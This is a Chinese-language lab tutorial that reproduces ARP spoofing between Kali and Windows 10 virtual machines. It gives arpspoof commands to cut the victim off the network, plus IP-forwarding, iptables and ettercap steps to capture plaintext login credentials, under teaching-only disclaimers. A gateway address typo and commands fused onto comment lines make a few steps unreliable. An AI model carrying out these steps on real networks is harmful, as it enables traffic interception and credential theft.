利用kali复现arp欺骗
本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。
复现步骤
开启两台机器:kali、windows10
确保两个机器是同一个网卡,默认都是nat的vmnet8
查看kali的IP地址(后面用fscan探测的就是kali所在的网络):
ip a
kali查看网络的网关:
route -n
kali利用fscan发现windows主机IP地址:
./FScan_2.0.1_linux_x64 -h kali所在的网段
./FScan_2.0.1_linux_x64 -h 192.168.198.0/24
发现windows10主机的IP地址
所以目前得到的信息是:
+ kali攻击机:192.168.198.130
+ Windows受害主机:192.168.198.129
+ 网关:19.168.198.2
断网攻击
kali执行:
sudo arpspoof -i kali查看网络信息时候的网卡 -t 受害者IP地址 伪装成的IP地址(网关)
sudo arpspoof -i eth0 -t 192.168.198.129 192.168.198.2# 注意sudo需要root的密码,也就是kali,并且输入密码不会显示出来,输入后直接回车就好了
Windows查看arp表:
arp -a
发现网关的mac地址和kali的mac地址一样,攻击成功
windows随便访问一个网站都是失败的:
kali执行arpspoof的终端按ctrl+C可以停止攻击
windows恢复正常
可以访问互联网:
抓取http明文信息(受害机器无感)
kali需要开启IP转发功能
sudo su
# 输入kali回车echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -o eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
kali执行arp攻击
arpspoof -i 网卡名 -t 受害者IP地址 -r 网关地址
arpspoof -i eth0 -t 192.168.198.129 -r 192.168.198.2
windows查看arp:
攻击成功,观察是否可以上网:
可以上网
kali新开一个终端运行:
sudo su
# 输入kali回车ettercap -Tq -i 网卡名
ettercap -Tq -i eth0
受害windows访问:
http://a.aixjt.com/AdminPublic.html
实验过程中如果发现windows又断网了,需要你重新上面的ip转发的操作就可以
随便输入账号密码之后登录,回到kali运行ettercap的终端:
发现了受害者输入的账号密码
本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。